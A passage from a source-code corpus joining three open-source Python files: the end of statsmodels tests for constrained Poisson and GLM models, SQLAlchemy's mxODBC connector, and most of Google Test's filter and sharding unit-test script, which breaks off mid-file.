#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
offset=np.log(data['pyears'].values))
#res1a = mod1a.fit()
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method': 'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, method='newton', disp=0)
class TestPoissonNoConstrained(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_noconstraint
cls.idx = [6, 2, 3, 4, 5, 0] # 1 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
#exposure=data['pyears'].values)
offset=np.log(data['pyears'].values))
res1 = mod.fit(disp=0)._results
# res1 is a duplicate check, so we can follow the same pattern
cls.res1 = (res1.params, res1.cov_params())
cls.res1m = res1
class TestPoissonConstrained2a(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_noexposure_constraint2
cls.idx = [7, 3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ logpyears + smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data)
# get start_params; the example fails to converge on one Python version on TravisCI
k_vars = len(mod.exog_names)
start_params = np.zeros(k_vars)
start_params[0] = np.log(mod.endog.mean())
# if we need them, these are the desired params
p = np.array([-9.43762015, 1.52762442, 2.74155711, 3.58730007,
4.08730007, 1.15987869, 0.12111539])
constr = 'C(agecat)[T.5] - C(agecat)[T.4] = 0.5'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
start_params=start_params,
fit_kwds={'method': 'bfgs', 'disp': 0})
# TODO: Newton fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, start_params=start_params,
method='bfgs', disp=0)
class TestPoissonConstrained2b(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint2
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
exposure=data['pyears'].values)
#offset=np.log(data['pyears'].values))
#res1a = mod1a.fit()
constr = 'C(agecat)[T.5] - C(agecat)[T.4] = 0.5'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method': 'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails to converge. overflow somewhere?
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr, method='bfgs', disp=0,
start_params=cls.res1[0])
class TestPoissonConstrained2c(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
cls.res2 = results.results_exposure_constraint2
#cls.idx = [3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
offset=np.log(data['pyears'].values))
constr = 'C(agecat)[T.5] - C(agecat)[T.4] = 0.5'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants,
fit_kwds={'method':'newton',
'disp': 0})
cls.constraints = lc
# TODO: bfgs fails
# test method of Poisson, not monkey patched
cls.res1m = mod.fit_constrained(constr,
method='bfgs', disp=0,
start_params=cls.res1[0])
class TestGLMPoissonConstrained1a(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
from statsmodels.base._constraints import fit_constrained
cls.res2 = results.results_noexposure_constraint
cls.idx = [7, 3, 4, 5, 6, 0, 1] # 2 is dropped baseline for categorical
# example without offset
formula = 'deaths ~ logpyears + smokes + C(agecat)'
mod = GLM.from_formula(formula, data=data,
family=families.Poisson())
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants)
cls.constraints = lc
cls.res1m = mod.fit_constrained(constr)
class TestGLMPoissonConstrained1b(CheckPoissonConstrainedMixin):
@classmethod
def setup_class(cls):
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.genmod import families
from statsmodels.base._constraints import fit_constrained
cls.res2 = results.results_exposure_constraint
cls.idx = [6, 2, 3, 4, 5, 0] # 2 is dropped baseline for categorical
# example with offset
formula = 'deaths ~ smokes + C(agecat)'
mod = GLM.from_formula(formula, data=data,
family=families.Poisson(),
offset=np.log(data['pyears'].values))
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constr)
cls.res1 = fit_constrained(mod, lc.coefs, lc.constants)
cls.constraints = lc
cls.res1m = mod.fit_constrained(constr)._results
def test_compare_glm_poisson(self):
res1 = self.res1m
res2 = self.res2
formula = 'deaths ~ smokes + C(agecat)'
mod = Poisson.from_formula(formula, data=data,
exposure=data['pyears'].values)
#offset=np.log(data['pyears'].values))
constr = 'C(agecat)[T.4] = C(agecat)[T.5]'
res2 = mod.fit_constrained(constr, start_params=self.res1m.params,
method='newton', warn_convergence=False,
disp=0)
# we get high precision because we use the params as start_params
# basic, just as check that we have the same model
assert_allclose(res1.params, res2.params, rtol=1e-12)
assert_allclose(res1.bse, res2.bse, rtol=1e-12)
# check predict, fitted, ...
predicted = res1.predict()
assert_allclose(predicted, res2.predict(), rtol=1e-10)
assert_allclose(res1.mu, predicted, rtol=1e-10)
assert_allclose(res1.fittedvalues, predicted, rtol=1e-10)
assert_allclose(res1.predict(linear=True), res2.predict(linear=True),
rtol=1e-10)
class CheckGLMConstrainedMixin(CheckPoissonConstrainedMixin):
# add tests for some GLM specific attributes
def test_glm(self):
res2 = self.res2 # reference results
res1 = self.res1m
#assert_allclose(res1.aic, res2.aic, rtol=1e-10) # far away
# Stata aic in ereturn and in estat ic are very different
# we have the same as estat ic
# see issue #1733
assert_allclose(res1.aic, res2.infocrit[4], rtol=1e-10)
assert_allclose(res1.bic, res2.bic, rtol=1e-10)
# bic is deviance based
#assert_allclose(res1.bic, res2.infocrit[5], rtol=1e-10)
assert_allclose(res1.deviance, res2.deviance, rtol=1e-10)
# TODO: which chi2 are these
#assert_allclose(res1.pearson_chi2, res2.chi2, rtol=1e-10)
class TestGLMLogitConstrained1(CheckGLMConstrainedMixin):
@classmethod
def setup_class(cls):
cls.idx = slice(None)
# params sequence same as Stata, but Stata reports param = nan
# and we have param = value = 0
#res1ul = Logit(data.endog, data.exog).fit(method="newton", disp=0)
cls.res2 = reslogit.results_constraint1
mod1 = GLM(spector_data.endog, spector_data.exog,
family=families.Binomial())
constr = 'x1 = 2.8'
cls.res1m = mod1.fit_constrained(constr)
R, q = cls.res1m.constraints.coefs, cls.res1m.constraints.constants
cls.res1 = fit_constrained(mod1, R, q)
class TestGLMLogitConstrained2(CheckGLMConstrainedMixin):
@classmethod
def setup_class(cls):
cls.idx = slice(None) # params sequence same as Stata
#res1ul = Logit(data.endog, data.exog).fit(method="newton", disp=0)
cls.res2 = reslogit.results_constraint2
mod1 = GLM(spector_data.endog, spector_data.exog,
family=families.Binomial())
constr = 'x1 - x3 = 0'
cls.res1m = mod1.fit_constrained(constr)
R, q = cls.res1m.constraints.coefs, cls.res1m.constraints.constants
cls.res1 = fit_constrained(mod1, R, q)
cls.constraints_rq = (R, q)
def test_predict(self):
# results only available for this case
res2 = self.res2 # reference results
res1 = self.res1m
predicted = res1.predict()
assert_allclose(predicted, res2.predict_mu, atol=1e-7)
assert_allclose(res1.mu, predicted, rtol=1e-10)
assert_allclose(res1.fittedvalues, predicted, rtol=1e-10)
def test_smoke(self):
# trailing text in summary, assumes it's the first extra string
summ = self.res1m.summary()
assert_('linear equality constraints' in summ.extra_txt)
summ = self.res1m.summary2()
assert_('linear equality constraints' in summ.extra_txt[0])
def test_fit_constrained_wrap(self):
# minimal test
res2 = self.res2 # reference results
from statsmodels.base._constraints import fit_constrained_wrap
res_wrap = fit_constrained_wrap(self.res1m.model, self.constraints_rq)
assert_allclose(res_wrap.params, res2.params, rtol=1e-6)
assert_allclose(res_wrap.params, res2.params, rtol=1e-6)
def junk():
# Singular Matrix in mod1a.fit()
formula1 = 'deaths ~ smokes + C(agecat)'
formula2 = 'deaths ~ C(agecat) + C(smokes) : C(agecat)' # same as Stata default
mod = Poisson.from_formula(formula2, data=data, exposure=data['pyears'].values)
res0 = mod.fit()
constraints = 'C(smokes)[T.1]:C(agecat)[3] = C(smokes)[T.1]:C(agecat)[4]'
import patsy
lc = patsy.DesignInfo(mod.exog_names).linear_constraint(constraints)
R, q = lc.coefs, lc.constants
resc = mod.fit_constrained(R, q, fit_kwds={'method': 'bfgs'})
# example without offset
formula1a = 'deaths ~ logpyears + smokes + C(agecat)'
mod1a = Poisson.from_formula(formula1a, data=data)
print(mod1a.exog.shape)
res1a = mod1a.fit()
lc_1a = patsy.DesignInfo(mod1a.exog_names).linear_constraint('C(agecat)[T.4] = C(agecat)[T.5]')
resc1a = mod1a.fit_constrained(lc_1a.coefs, lc_1a.constants, fit_kwds={'method':'newton'})
print(resc1a[0])
print(resc1a[1])
| bsd-3-clause |
olivierdalang/stdm | third_party/sqlalchemy/connectors/mxodbc.py | 1 | 5498 | # connectors/mxodbc.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
Provide an SQLAlchemy connector for the eGenix mxODBC commercial
Python adapter for ODBC. This is not a free product, but eGenix
provides SQLAlchemy with a license for use in continuous integration
testing.
This has been tested for use with mxODBC 3.1.2 on SQL Server 2005
and 2008, using the SQL Server Native driver. However, it is
possible for this to be used on other database platforms.
For more info on mxODBC, see http://www.egenix.com/
"""
import sys
import re
import warnings
from . import Connector
class MxODBCConnector(Connector):
driver = 'mxodbc'
supports_sane_multi_rowcount = False
supports_unicode_statements = True
supports_unicode_binds = True
supports_native_decimal = True
@classmethod
def dbapi(cls):
# this classmethod will normally be replaced by an instance
# attribute of the same name, so this is normally only called once.
cls._load_mx_exceptions()
platform = sys.platform
if platform == 'win32':
from mx.ODBC import Windows as module
# this can be the string "linux2", and possibly others
elif 'linux' in platform:
from mx.ODBC import unixODBC as module
elif platform == 'darwin':
from mx.ODBC import iODBC as module
else:
raise ImportError("Unrecognized platform for mxODBC import")
return module
@classmethod
def _load_mx_exceptions(cls):
""" Import mxODBC exception classes into the module namespace,
as if they had been imported normally. This is done here
to avoid requiring all SQLAlchemy users to install mxODBC.
"""
global InterfaceError, ProgrammingError
from mx.ODBC import InterfaceError
from mx.ODBC import ProgrammingError
def on_connect(self):
def connect(conn):
conn.stringformat = self.dbapi.MIXED_STRINGFORMAT
conn.datetimeformat = self.dbapi.PYDATETIME_DATETIMEFORMAT
conn.decimalformat = self.dbapi.DECIMAL_DECIMALFORMAT
conn.errorhandler = self._error_handler()
return connect
def _error_handler(self):
""" Return a handler that adjusts mxODBC's raised Warnings to
emit Python standard warnings.
"""
from mx.ODBC.Error import Warning as MxOdbcWarning
def error_handler(connection, cursor, errorclass, errorvalue):
if issubclass(errorclass, MxOdbcWarning):
errorclass.__bases__ = (Warning,)
warnings.warn(message=str(errorvalue),
category=errorclass,
stacklevel=2)
else:
raise errorclass(errorvalue)
return error_handler
def create_connect_args(self, url):
""" Return a tuple of *args,**kwargs for creating a connection.
The mxODBC 3.x connection constructor looks like this:
connect(dsn, user='', password='',
clear_auto_commit=1, errorhandler=None)
This method translates the values in the provided uri
into args and kwargs needed to instantiate an mxODBC Connection.
The arg 'errorhandler' is not used by SQLAlchemy and will
not be populated.
"""
opts = url.translate_connect_args(username='user')
opts.update(url.query)
args = opts.pop('host')
opts.pop('port', None)
opts.pop('database', None)
return (args,), opts
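# Illustrative example (ours, not from the original source): a URL like
#   mxodbc://scott:tiger@mydsn
# would typically translate to
#     args   == ('mydsn',)
#     kwargs == {'user': 'scott', 'password': 'tiger'}
# i.e. the DSN is passed positionally, credentials as keywords.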
def is_disconnect(self, e, connection, cursor):
# TODO: eGenix recommends checking connection.closed here
# Does that detect dropped connections ?
if isinstance(e, self.dbapi.ProgrammingError):
return "connection already closed" in str(e)
elif isinstance(e, self.dbapi.Error):
return '[08S01]' in str(e)
else:
return False
def _get_server_version_info(self, connection):
# eGenix suggests using conn.dbms_version instead
# of what we're doing here
dbapi_con = connection.connection
version = []
r = re.compile(r'[.\-]')
# 18 == pyodbc.SQL_DBMS_VER
for n in r.split(dbapi_con.getinfo(18)[1]):
try:
version.append(int(n))
except ValueError:
version.append(n)
return tuple(version)
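# Illustrative example (ours): a driver-reported version string such as
# '09.00.1399' is split on '.' and '-' and returned as (9, 0, 1399);
# non-numeric fragments are kept as strings, so '11.0-RC1' would come
# back as (11, 0, 'RC1').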
def _get_direct(self, context):
if context:
native_odbc_execute = context.execution_options.\
get('native_odbc_execute', 'auto')
# default to direct=True in all cases; it is more generally
# compatible, especially with SQL Server
return False if native_odbc_execute is True else True
else:
return True
def do_executemany(self, cursor, statement, parameters, context=None):
cursor.executemany(
statement, parameters, direct=self._get_direct(context))
def do_execute(self, cursor, statement, parameters, context=None):
cursor.execute(statement, parameters, direct=self._get_direct(context))
| gpl-2.0 |
rowboat/external-gtest | test/gtest_filter_unittest.py | 21 | 17763 | #!/usr/bin/env python
#
# Copyright 2005, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test test filters.
A user can specify which test(s) in a Google Test program to run via either
the GTEST_FILTER environment variable or the --gtest_filter flag.
This script tests such functionality by invoking
gtest_filter_unittest_ (a program written with Google Test) with different
environments and command line flags.
Note that test sharding may also influence which tests are filtered. Therefore,
we test that here also.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sets
import tempfile
import unittest
import gtest_test_utils
# Constants.
# The environment variable for specifying the test filters.
FILTER_ENV_VAR = 'GTEST_FILTER'
# The environment variables for test sharding.
TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS'
SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX'
SHARD_STATUS_FILE_ENV_VAR = 'GTEST_SHARD_STATUS_FILE'
# The command line flag for specifying the test filters.
FILTER_FLAG = 'gtest_filter'
# The command line flag for including disabled tests.
ALSO_RUN_DISABLED_TESTS_FLAG = 'gtest_also_run_disabled_tests'
# Command to run the gtest_filter_unittest_ program.
COMMAND = os.path.join(gtest_test_utils.GetBuildDir(),
'gtest_filter_unittest_')
# Regex for determining whether parameterized tests are enabled in the binary.
PARAM_TEST_REGEX = re.compile(r'/ParamTest')
# Regex for parsing test case names from Google Test's output.
TEST_CASE_REGEX = re.compile(r'^\[\-+\] \d+ tests? from (\w+(/\w+)?)')
# Regex for parsing test names from Google Test's output.
TEST_REGEX = re.compile(r'^\[\s*RUN\s*\].*\.(\w+(/\w+)?)')
# Full names of all tests in gtest_filter_unittests_.
PARAM_TESTS = [
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestX/1',
'SeqP/ParamTest.TestY/0',
'SeqP/ParamTest.TestY/1',
'SeqQ/ParamTest.TestX/0',
'SeqQ/ParamTest.TestX/1',
'SeqQ/ParamTest.TestY/0',
'SeqQ/ParamTest.TestY/1',
]
DISABLED_TESTS = [
'BarTest.DISABLED_TestFour',
'BarTest.DISABLED_TestFive',
'BazTest.DISABLED_TestC',
'DISABLED_FoobarTest.Test1',
'DISABLED_FoobarTest.DISABLED_Test2',
'DISABLED_FoobarbazTest.TestA',
]
# All the non-disabled tests.
ACTIVE_TESTS = [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
'HasDeathTest.Test1',
'HasDeathTest.Test2',
] + PARAM_TESTS
param_tests_present = None
# Utilities.
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def Run(command):
"""Runs a Google Test program and returns a list of full names of the
tests that were run along with the test exit code.
"""
stdout_file = os.popen(command, 'r')
tests_run = []
test_case = ''
test = ''
for line in stdout_file:
match = TEST_CASE_REGEX.match(line)
if match is not None:
test_case = match.group(1)
else:
match = TEST_REGEX.match(line)
if match is not None:
test = match.group(1)
tests_run += [test_case + '.' + test]
exit_code = stdout_file.close()
return (tests_run, exit_code)
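# Worked example (ours): given program output containing
#   [----------] 2 tests from FooTest
#   [ RUN      ] FooTest.Abc
#   [ RUN      ] FooTest.Xyz
# Run(command) returns (['FooTest.Abc', 'FooTest.Xyz'], None); the exit
# code is None because os.popen(...).close() returns None when the child
# exits with status 0.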
def InvokeWithModifiedEnv(extra_env, function, *args, **kwargs):
"""Runs the given function and arguments in a modified environment."""
try:
original_env = os.environ.copy()
os.environ.update(extra_env)
return function(*args, **kwargs)
finally:
for key in extra_env.iterkeys():
if key in original_env:
os.environ[key] = original_env[key]
else:
del os.environ[key]
def RunWithSharding(total_shards, shard_index, command):
"""Runs the Google Test program shard and returns a list of full names of the
tests that were run along with the exit code.
"""
extra_env = {SHARD_INDEX_ENV_VAR: str(shard_index),
TOTAL_SHARDS_ENV_VAR: str(total_shards)}
return InvokeWithModifiedEnv(extra_env, Run, command)
# The unit test.
class GTestFilterUnitTest(unittest.TestCase):
"""Tests using the GTEST_FILTER environment variable or the
--gtest_filter flag to filter tests.
"""
# Utilities.
def AssertSetEqual(self, lhs, rhs):
"""Asserts that two sets are equal."""
for elem in lhs:
self.assert_(elem in rhs, '%s in %s' % (elem, rhs))
for elem in rhs:
self.assert_(elem in lhs, '%s in %s' % (elem, lhs))
def AssertPartitionIsValid(self, set_var, list_of_sets):
"""Asserts that list_of_sets is a valid partition of set_var."""
full_partition = []
for slice_var in list_of_sets:
full_partition.extend(slice_var)
self.assertEqual(len(set_var), len(full_partition))
self.assertEqual(sets.Set(set_var), sets.Set(full_partition))
def RunAndVerify(self, gtest_filter, tests_to_run):
"""Runs gtest_flag_unittest_ with the given filter, and verifies
that the right set of tests were run.
"""
# Adjust tests_to_run in case value parameterized tests are disabled
# in the binary.
global param_tests_present
if not param_tests_present:
tests_to_run = list(sets.Set(tests_to_run) - sets.Set(PARAM_TESTS))
# First, tests using GTEST_FILTER.
SetEnvVar(FILTER_ENV_VAR, gtest_filter)
tests_run = Run(COMMAND)[0]
SetEnvVar(FILTER_ENV_VAR, None)
self.AssertSetEqual(tests_run, tests_to_run)
# Next, tests using --gtest_filter.
if gtest_filter is None:
command = COMMAND
else:
command = '%s --%s=%s' % (COMMAND, FILTER_FLAG, gtest_filter)
tests_run = Run(command)[0]
self.AssertSetEqual(tests_run, tests_to_run)
def RunAndVerifyWithSharding(self, gtest_filter, total_shards, tests_to_run,
command=COMMAND, check_exit_0=False):
"""Runs all shards of gtest_flag_unittest_ with the given filter, and
verifies that the right set of tests were run. The union of tests run
on each shard should be identical to tests_to_run, without duplicates.
If check_exit_0, make sure that all shards returned 0.
"""
SetEnvVar(FILTER_ENV_VAR, gtest_filter)
partition = []
for i in range(0, total_shards):
(tests_run, exit_code) = RunWithSharding(total_shards, i, command)
if check_exit_0:
self.assert_(exit_code is None)
partition.append(tests_run)
self.AssertPartitionIsValid(tests_to_run, partition)
SetEnvVar(FILTER_ENV_VAR, None)
def RunAndVerifyAllowingDisabled(self, gtest_filter, tests_to_run):
"""Runs gtest_flag_unittest_ with the given filter, and enables
disabled tests. Verifies that the right set of tests were run.
"""
# Construct the command line.
command = '%s --%s' % (COMMAND, ALSO_RUN_DISABLED_TESTS_FLAG)
if gtest_filter is not None:
command = '%s --%s=%s' % (command, FILTER_FLAG, gtest_filter)
tests_run = Run(command)[0]
self.AssertSetEqual(tests_run, tests_to_run)
def setUp(self):
"""Sets up test case. Determines whether value-parameterized tests are
enabled in the binary and sets flags accordingly.
"""
global param_tests_present
if param_tests_present is None:
param_tests_present = PARAM_TEST_REGEX.search(
'\n'.join(os.popen(COMMAND, 'r').readlines())) is not None
def testDefaultBehavior(self):
"""Tests the behavior of not specifying the filter."""
self.RunAndVerify(None, ACTIVE_TESTS)
def testDefaultBehaviorWithShards(self):
"""Tests the behavior of not specifying the filter, with sharding
enabled.
"""
self.RunAndVerifyWithSharding(None, 1, ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, 2, ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) - 1, ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS), ACTIVE_TESTS)
self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) + 1, ACTIVE_TESTS)
def testEmptyFilter(self):
"""Tests an empty filter."""
self.RunAndVerify('', [])
self.RunAndVerifyWithSharding('', 1, [])
self.RunAndVerifyWithSharding('', 2, [])
def testBadFilter(self):
"""Tests a filter that matches nothing."""
self.RunAndVerify('BadFilter', [])
self.RunAndVerifyAllowingDisabled('BadFilter', [])
def testFullName(self):
"""Tests filtering by full name."""
self.RunAndVerify('FooTest.Xyz', ['FooTest.Xyz'])
self.RunAndVerifyAllowingDisabled('FooTest.Xyz', ['FooTest.Xyz'])
self.RunAndVerifyWithSharding('FooTest.Xyz', 5, ['FooTest.Xyz'])
def testUniversalFilters(self):
"""Tests filters that match everything."""
self.RunAndVerify('*', ACTIVE_TESTS)
self.RunAndVerify('*.*', ACTIVE_TESTS)
self.RunAndVerifyWithSharding('*.*', len(ACTIVE_TESTS) - 3, ACTIVE_TESTS)
self.RunAndVerifyAllowingDisabled('*', ACTIVE_TESTS + DISABLED_TESTS)
self.RunAndVerifyAllowingDisabled('*.*', ACTIVE_TESTS + DISABLED_TESTS)
def testFilterByTestCase(self):
"""Tests filtering by test case name."""
self.RunAndVerify('FooTest.*', ['FooTest.Abc', 'FooTest.Xyz'])
BAZ_TESTS = ['BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB']
self.RunAndVerify('BazTest.*', BAZ_TESTS)
self.RunAndVerifyAllowingDisabled('BazTest.*',
BAZ_TESTS + ['BazTest.DISABLED_TestC'])
def testFilterByTest(self):
"""Tests filtering by test name."""
self.RunAndVerify('*.TestOne', ['BarTest.TestOne', 'BazTest.TestOne'])
def testFilterDisabledTests(self):
"""Select only the disabled tests to run."""
self.RunAndVerify('DISABLED_FoobarTest.Test1', [])
self.RunAndVerifyAllowingDisabled('DISABLED_FoobarTest.Test1',
['DISABLED_FoobarTest.Test1'])
self.RunAndVerify('*DISABLED_*', [])
self.RunAndVerifyAllowingDisabled('*DISABLED_*', DISABLED_TESTS)
self.RunAndVerify('*.DISABLED_*', [])
self.RunAndVerifyAllowingDisabled('*.DISABLED_*', [
'BarTest.DISABLED_TestFour',
'BarTest.DISABLED_TestFive',
'BazTest.DISABLED_TestC',
'DISABLED_FoobarTest.DISABLED_Test2',
])
self.RunAndVerify('DISABLED_*', [])
self.RunAndVerifyAllowingDisabled('DISABLED_*', [
'DISABLED_FoobarTest.Test1',
'DISABLED_FoobarTest.DISABLED_Test2',
'DISABLED_FoobarbazTest.TestA',
])
def testWildcardInTestCaseName(self):
"""Tests using wildcard in the test case name."""
self.RunAndVerify('*a*.*', [
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
'HasDeathTest.Test1',
'HasDeathTest.Test2', ] + PARAM_TESTS)
def testWildcardInTestName(self):
"""Tests using wildcard in the test name."""
self.RunAndVerify('*.*A*', ['FooTest.Abc', 'BazTest.TestA'])
def testFilterWithoutDot(self):
"""Tests a filter that has no '.' in it."""
self.RunAndVerify('*z*', [
'FooTest.Xyz',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
])
def testTwoPatterns(self):
"""Tests filters that consist of two patterns."""
self.RunAndVerify('Foo*.*:*A*', [
'FooTest.Abc',
'FooTest.Xyz',
'BazTest.TestA',
])
# An empty pattern + a non-empty one
self.RunAndVerify(':*A*', ['FooTest.Abc', 'BazTest.TestA'])
def testThreePatterns(self):
"""Tests filters that consist of three patterns."""
self.RunAndVerify('*oo*:*A*:*One', [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BazTest.TestOne',
'BazTest.TestA',
])
# The 2nd pattern is empty.
self.RunAndVerify('*oo*::*One', [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BazTest.TestOne',
])
# The last 2 patterns are empty.
self.RunAndVerify('*oo*::', [
'FooTest.Abc',
'FooTest.Xyz',
])
def testNegativeFilters(self):
self.RunAndVerify('*-HasDeathTest.Test1', [
'FooTest.Abc',
'FooTest.Xyz',
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
'HasDeathTest.Test2',
] + PARAM_TESTS)
self.RunAndVerify('*-FooTest.Abc:HasDeathTest.*', [
'FooTest.Xyz',
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
] + PARAM_TESTS)
self.RunAndVerify('BarTest.*-BarTest.TestOne', [
'BarTest.TestTwo',
'BarTest.TestThree',
])
# Tests without leading '*'.
self.RunAndVerify('-FooTest.Abc:FooTest.Xyz:HasDeathTest.*', [
'BarTest.TestOne',
'BarTest.TestTwo',
'BarTest.TestThree',
'BazTest.TestOne',
'BazTest.TestA',
'BazTest.TestB',
] + PARAM_TESTS)
# Value parameterized tests.
self.RunAndVerify('*/*', PARAM_TESTS)
# Value parameterized tests filtering by the sequence name.
self.RunAndVerify('SeqP/*', [
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestX/1',
'SeqP/ParamTest.TestY/0',
'SeqP/ParamTest.TestY/1',
])
# Value parameterized tests filtering by the test name.
self.RunAndVerify('*/0', [
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestY/0',
'SeqQ/ParamTest.TestX/0',
'SeqQ/ParamTest.TestY/0',
])
def testFlagOverridesEnvVar(self):
"""Tests that the --gtest_filter flag overrides the GTEST_FILTER
environment variable.
"""
SetEnvVar(FILTER_ENV_VAR, 'Foo*')
command = '%s --%s=%s' % (COMMAND, FILTER_FLAG, '*One')
tests_run = Run(command)[0]
SetEnvVar(FILTER_ENV_VAR, None)
self.AssertSetEqual(tests_run, ['BarTest.TestOne', 'BazTest.TestOne'])
def testShardStatusFileIsCreated(self):
"""Tests that the shard file is created if specified in the environment."""
test_tmpdir = tempfile.mkdtemp()
shard_status_file = os.path.join(test_tmpdir, 'shard_status_file')
self.assert_(not os.path.exists(shard_status_file))
extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file}
stdout_file = InvokeWithModifiedEnv(extra_env, os.popen, COMMAND, 'r')
try:
stdout_file.readlines()
finally:
stdout_file.close()
self.assert_(os.path.exists(shard_status_file))
os.remove(shard_status_file)
os.removedirs(test_tmpdir)
def testShardStatusFileIsCreatedWithListTests(self):
"""Tests that the shard file is created with --gtest_list_tests."""
test_tmpdir = tempfile.mkdtemp()
shard_status_file = os.path.join(test_tmpdir, 'shard_status_file2')
self.assert_(not os.path.exists(shard_status_file))
extra_env = {SHARD_STATUS_FILE_ENV_VAR: shard_status_file}
stdout_file = InvokeWithModifiedEnv(extra_env, os.popen,
'%s --gtest_list_tests' % COMMAND, 'r')
try:
stdout_file.readlines()
finally:
stdout_file.close()
self.assert_(os.path.exists(shard_status_file))
os.remove(shard_status_file)
os.removedirs(test_tmpdir)
def testShardingWorksWithDeathTests(self):
"""Tests integration with death tests and sharding."""
